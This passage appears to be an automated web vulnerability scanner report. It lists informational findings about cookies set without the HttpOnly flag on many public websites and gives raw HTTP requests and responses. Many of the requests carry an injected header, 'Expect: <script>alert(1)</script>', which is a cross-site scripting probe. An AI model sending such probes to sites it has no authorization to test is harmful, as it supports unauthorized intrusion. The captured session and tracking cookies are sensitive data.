partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304303011+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuF49ZlFgEli8eofb1kUGDVW7wTSBkwWG29/ecvCJcKxYj6rAKPE5L7TQFkGDQYDBgsGoOjO+8xA0Vnz1yJEAeCpF3s="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm8FkZwczFzPHRBUgMd0YyJ/5AyQ6B0zOBZLMHAuCgcy1+xmB5PoPjECBjcVA5o5djFxcHDv3MQvMOjjnHQtQeL8fUPhgN0jdoSMgjUdzgMyTYDNO5wCJcyD+he8gky/uBZFPLoCM+xcOIjgACq4pOw=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjkuY4HijAJLF49Y+3LAqMGvdBtAGTxcbbX96ycAlzbAsVYJSY3HcaKMmgwWDAYMEAFNzrAhScNX8tQhAAe68V+g=="; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
17.107. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.24-7pressrelease.com
Path:   /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php HTTP/1.1
Host: www.24-7pressrelease.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:39 GMT
Server: Apache
Vary: User-Agent
Set-Cookie: tf7sid=a9l3d80hrmsh2jf67cj61qtuj2; path=/; domain=.24-7pressrelease.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 37188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Press Release - The
...[SNIP]...
17.108. http://www.3fatchicks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3fatchicks.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.3fatchicks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:47:47 GMT
Server: Apache
Content-Length: 389
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerthreefatchicks_pool=518262956.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.109. http://www.accesskansas.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accesskansas.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.accesskansas.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:18:10 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerSTAT-01=QKGsRgMAa5lUWp9i2/r4yXnQdKxpymKGVJRI5Nbcz4K7PlZRpffuOmnV9NFsVVUVzv198eSCnFF+nA==; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.110. http://www.ahealthyme.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ahealthyme.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ahealthyme.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: "Redirect Web Server 7"
Date: Mon, 02 May 2011 00:01:30 GMT
Location: http://www.bluecrossma.com/redirect/ahealthyme/ahealthyme.html
Content-length: 0
Set-Cookie: NSC_MCW-Sfejsfdu=4481ff2429a5;Version=1;path=/

17.111. http://www.batr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.batr.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.batr.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:42 GMT
Set-Cookie: persist-identification=2509762001.20480.0000; expires=Mon, 02-May-2011 00:49:41 GMT; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
17.112. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=I=1&TS=1304292748

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:30 GMT
Connection: close
Set-Cookie: _HOP=; domain=.bing.com; path=/
Set-Cookie: _SS=SID=54196B2489E649DC9D985351F7EDDDA0; domain=.bing.com; path=/
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...
17.113. http://www.bing.com/HPImageArchive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /HPImageArchive.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HPImageArchive.aspx?format=xml&idx=0&n=1&nc=1304310754936 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2483
Content-Type: text/xml; charset=utf-8
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:36 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8" ?><images><image><startdate>20110501</startdate><fullstartdate>201105010700</fullstartdate><enddate>20110502</enddate><url>/fd/hpk2/EmpireState_EN-US1121929261.jpg
...[SNIP]...
17.114. http://www.bing.com/fd/fb/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/r?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=GgAg

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:32 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:32 GMT; domain=.bing.com; path=/
Content-Length: 2125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...
17.115. http://www.bing.com/fd/fb/u  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/u

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/u?v=7_04_0_906814&sId=0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=15552000
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:36 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:35 GMT; domain=.bing.com; path=/
Content-Length: 2611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; char
...[SNIP]...
17.116. http://www.bing.com/fd/ls/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/ls/l?IG=2d5571d309564964970af86c3c5fef46&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:4,%22FC%22:-1,%22BC%22:4,%22BS%22:12,%22H%22:15,%22FE%22:-1,%22LE%22:-1,%22C1%22:-1,%22C2%22:-1,%22BP%22:134,%22KP%22:-1,%22CT%22:139,%22IL%22:0}}&P=SERP&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sun, 01 May 2011 23:32:31 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:30 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;
17.117. http://www.bing.com/scopePopupHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /scopePopupHandler.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scopePopupHandler.aspx?IID=SERP.1000&IG=2d5571d309564964970af86c3c5fef46&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; RMS=F=CgAg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:34 GMT
Connection: close
Set-Cookie: SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; expires=Tue, 30-Apr-2013 23:32:33 GMT; domain=.bing.com; path=/
Content-Length: 4593

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&amp;qpvt=wallpaper" onmousedown="return
...[SNIP]...
17.118. http://www.blazerforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blazerforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blazerforum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 PHP/5.2.6
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerAFUWEB_www_pool=1106972844.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
17.119. http://www.bloodhero.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloodhero.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bloodhero.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:24 GMT
Content-Length: 1245
Set-Cookie: LB-Persist=fNseG2JLIN1fvRsfq0RBYKAdAX8wCR1ZAd6EE44jW6VtnYlF0SkFNygUjMzdXzKRZOl834Xc69W6zng=; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
17.120. http://www.bridgestonetire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgestonetire.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bridgestonetire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:31:12 GMT
Content-Length: 1245
Set-Cookie: Coyote-2-a320121=a320137:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
17.121. http://www.cosmeticscop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cosmeticscop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=86192b3f-96a1-4c58-aae6-ace34af4c08a; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ak5g2p55u4jtmvbge5by5sfw; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Content-Length: 1295


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link rel=
...[SNIP]...
17.122. http://www.course.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.course.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.course.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:07:04 GMT
Set-Cookie: course=1335205898.20480.0000; path=/

17.123. http://www.creditscorecomplete.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditscorecomplete.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.creditscorecomplete.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:24 GMT
Set-Cookie: NSC_iuuq_xxxdsfejutdpsfdpnqmfuf=ffffffff0909330b45525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 00:56:25 GMT;path=/
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
